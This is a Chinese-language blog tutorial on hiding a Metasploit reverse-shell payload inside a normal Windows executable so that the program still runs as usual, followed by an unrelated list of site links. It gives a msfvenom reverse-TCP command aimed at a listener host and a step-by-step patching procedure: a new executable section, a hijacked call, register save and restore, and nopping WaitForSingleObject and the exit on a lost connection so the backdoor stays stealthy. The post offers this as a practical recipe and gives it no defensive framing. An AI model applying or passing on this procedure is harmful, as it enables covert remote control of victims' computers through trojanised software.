在不影响程序使用的情况下添加shellcode
时间:2022-07-23
本文章向大家介绍在不影响程序使用的情况下添加shellcode,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
参考
在文章Backdooring PE Files with Shellcode中介绍了一种在正常程序中注入shellcode的方式,让程序以前的逻辑照常能够正常运行,下面复现一下并解决几个小问题。
示例程序代码
这里直接编译一个32位的HelloWorld程序为例:
#include <stdio.h>
int main()
{
puts("Hello World!");
return 0;
}
编译后的exe,可以使用CFF Explorer
查看相关信息。
大致步骤
少绕弯子,补充一下通用步骤:
- 利用msf生成一个payload,保存成一个bin文件,命令:
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.5 LPORT=443 | hexdump -C
- 通过010Editor等编辑工具在bin文件的前后各插入20-40个字节,以90填充
- 在目标exe中添加一个新的代码段,将bin的内容导入,并设置可读、可写、可执行、包含代码等属性标志
- 更新header大小以及重建PE头
- 使用x32dbg调试exe并查看新加代码段的基址,例如是
0x004A0000
- 一个5字节长度的指令,例如:
call 0x00471B50
,覆盖成jmp 0x004A0000
- 记住下一条指令的位置,例如:
0x00491EF8
,后面恢复程序正常逻辑的时候要用 - 编辑代码段开头,用
pushad
和pushfd
指令覆盖开头2个字节 - 调试exe,观察
pushfd
之后的ESP
值,例如0x010FFDBC
,以及shellcode执行结束时ESP
值,例如0x010FFBB8
,发现少了0x204
- 为了能够恢复之前的寄存器状态,在shellcode最后追加指令
add esp, 0x204
- 追加
popfd
和popad
指令,和push
顺序相反 - 将第6步中覆盖前的指令追加到
popad
之后 - 最后,恢复之前的运行逻辑,追加
jmp 0x00491EF8
指令,跳到第7步记录位置
问题1:到12和13步总是不能跳到正确的位置
注意三点:
- 第6步和第7步获取的值要保证当前调试的PE头大小是和最终的PE头大小是一致的,检查第4步操作
- 每次调试exe的时候,基址可能会发生变化,所以复制的指令只能用于修改当前调式实例
- 在复制jmp指令的机器码的时候,注意不要和目标跳转位置太近,会复制成短地址的指令
问题2:保证步骤没问题之后,程序仍然不能恢复正常逻辑
通过调试将发生阻塞的操作进行nop,例如WaitForSingleObject
,msf
的payload需要将4e 56 46 ff
替换成80 56 80 ff
原来给WaitForSingleObject
传的参数是-1
,会阻塞线程,想办法改成0就行,这里将dec esi
操作nop
掉了,push esi
就是0
问题3:在监听端失联的情况下,程序长时间阻塞后程序终止
应该是检查服务端失联的情况下直接终止程序了,通过调试找到终止位置nop掉即可
问题4:在哪找代码段的基址
除了参考文章中提到的通过文件偏移计算,还可以直接利用x32dbg的内存布局直接查看
最后效果
省略。。。
- 自动刷新页面
- Python语言被列入全国计算机等级考试科目中
- WordPress纯代码高仿 无觅相关文章 图文模式功能
- 各种序列化库的性能数据
- WordPress内置搜索结果只有一篇文章时自动跳转到该文章
- Flash/Flex学习笔记(23):运动学原理
- WordPress重定向作者归档链接到“关于”页面
- Flash/Flex学习笔记(25):摩擦力与屏幕环绕
- 搞事情!富士通和微软强强联手用AI加速工作方式转变
- MySQL管理工具HeidiSQL
- Centos 使用YUM安装MariaDB
- Div Scroll Bar (用层模拟滚动条)
- WordPress免插件仅代码实现文章浏览次数的方法(3)
- 定义新智慧,这AI很“远景X3”
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- Python爬虫之scrapy的日志信息与配置
- Python爬虫之scrapyd部署scrapy项目
- 最近发现一个很有趣的随机小姐姐视频源码 分享给大家
- Codeforces Round #633 (Div. 2)C Powered Addition (贪心,二进制)
- Spring 整合 JUnit
- Java Stax解析XML示例
- Codeforces Round #633 (Div. 2) B Sorted Adjacent Differences(直观感知+排序插放)
- Spring 声明式事务
- Leetcode 1320 二指输入的的最小距离(多情况讨论,DP)
- Spring 基本注解
- Spring 基于注解的 IOC 与 AOP
- Leetcode 1319 连通网络的操作次数(并查集)
- Leetcode 77. 组合 (排列组合,回溯)
- C++17特性 string_view substr只要常数复杂度,且省内存
- MQ 系列之 ActiveMQ 基本使用